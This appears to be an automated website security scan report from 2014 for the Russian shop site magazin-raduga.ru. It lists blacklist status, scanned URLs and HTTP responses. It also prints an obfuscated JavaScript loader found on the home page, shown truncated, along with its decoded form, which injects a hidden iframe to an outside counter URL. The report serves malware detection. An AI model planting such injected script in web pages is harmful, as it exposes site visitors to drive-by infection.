Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=magazin-raduga.ru
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://magazin-raduga.ru/ | 200 OK Content-Length: 9142 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
if(window.document)aa=/s/g.exec("s").index+[];aaa='0';if(aa.indexOf(aaa)===0){ss='';try{if(/12/.exec(23).index==0);}catch(qqq){s=String;}ee='e';e=window.eval;t='y';}h=2*Math.cos(Math.PI);n=[3.5,3.5,51.5,50,15,19,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,19.5,60.5,3.5,3.5,3.5,51.5,50,56,47.5,53.5,49.5,56,19,19.5,28.5,3.5,3.5,61.5,15,49.5,53,56.5,49.5,15,60.5,3.5,3.5,3.5,
Decoded script:
if (document.getElementsByTagName('body')[0]){
  iframer();
} else {
  document.write("<iframe src='http://diminishxstatss.info/stats/counter.php?id=2f585bea1e9e20b1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
  var f = document.createElement('iframe');
  f.setAttribute('src','http://diminishxstatss.info/stats/counter.php?id=2f585bea1e9e20b1');
  f.style.visibility='hidden';
  f.style.position='absolute';
<iframe src='http://diminishxstatss.info/stats/counter.php?id=2f585bea1e9e20b1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>
Antivirus reports:
http://expodimilano.it/wp-content/jquery.js | 404 Not Found Content-Length: 299 Content-Type: text/html | clean |
http://expodimilano.it/test404page.js | 404 Not Found Content-Length: 293 Content-Type: text/html | clean |
http://halehalemusic.com/css/header.js | 500 Can't connect to halehalemusic.com:80 Content-Length: 192 Content-Type: text/plain | clean |
http://robertwalz.com/header.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sat, 27 Dec 2014 14:03:58 GMT Pragma: no-cache Location: http://www.robertwalz.com/header.js/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=OiXWC%2CWZHyrNsKFEbBvIk3; path=/ X-Pingback: http://www.robertwalz.com/wp/xmlrpc.php | clean |
http://www.robertwalz.com/header.js/ | 200 OK Content-Length: 5422 Content-Type: text/html | clean |
http://www.robertwalz.com/wp/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/javascript | clean |
http://www.robertwalz.com/wp/wp-content/plugins/pods/ui/js/pods.ui.js?ver=3.5.1 | 200 OK Content-Length: 590 Content-Type: application/javascript | clean |
http://www.robertwalz.com/wp/wp-content/themes/rw/js/jquery.cycle.min.js?ver=3.5.1 | 200 OK Content-Length: 20004 Content-Type: application/javascript | clean |
http://www.robertwalz.com/wp/wp-includes/js/jquery/jquery.form.min.js?ver=2.73 | 200 OK Content-Length: 11116 Content-Type: application/javascript | clean |
http://www.robertwalz.com/wp/wp-content/plugins/contact-form-7/scripts.js?ver=2.3 | 200 OK Content-Length: 4442 Content-Type: application/javascript | clean |
http://robertwalz.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sat, 27 Dec 2014 14:04:05 GMT Pragma: no-cache Location: http://www.robertwalz.com/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=fUGQRPEIoAqRuPbb5Jbbx2; path=/ X-Pingback: http://www.robertwalz.com/wp/xmlrpc.php | clean |
http://www.robertwalz.com/ | 200 OK Content-Length: 5422 Content-Type: text/html | clean |
http://www.robertwalz.com/?page_id=2 | 200 OK Content-Length: 4507 Content-Type: text/html | clean |
http://www.robertwalz.com/?page_id=39 | 200 OK Content-Length: 12435 Content-Type: text/html | clean |
http://www.robertwalz.com/wp/wp-content/uploads/2011/03/DSCN0464_2.jpg | 200 OK Content-Length: 300522 Content-Type: image/jpeg | clean |
http://www.robertwalz.com/wp/wp-content/uploads/2011/03/DSCN6348.jpg | 200 OK Content-Length: 300522 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: magazin-raduga.ru
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0
Connection: close
Date: Sat, 27 Dec 2014 14:03:56 GMT
Accept-Ranges: bytes
ETag: "98c4de-23b6-4baf95f56f500"
Server: Apache
Vary: Accept-Encoding
Content-Length: 9142
Content-Type: text/html; charset=windows-1251
Expires: Sat, 27 Dec 2014 14:03:56 GMT
Last-Modified: Sun, 11 Mar 2012 15:35:16 GMT
...9142 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: magazin-raduga.ru
Referer: http://www.google.com/search?q=magazin-raduga.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.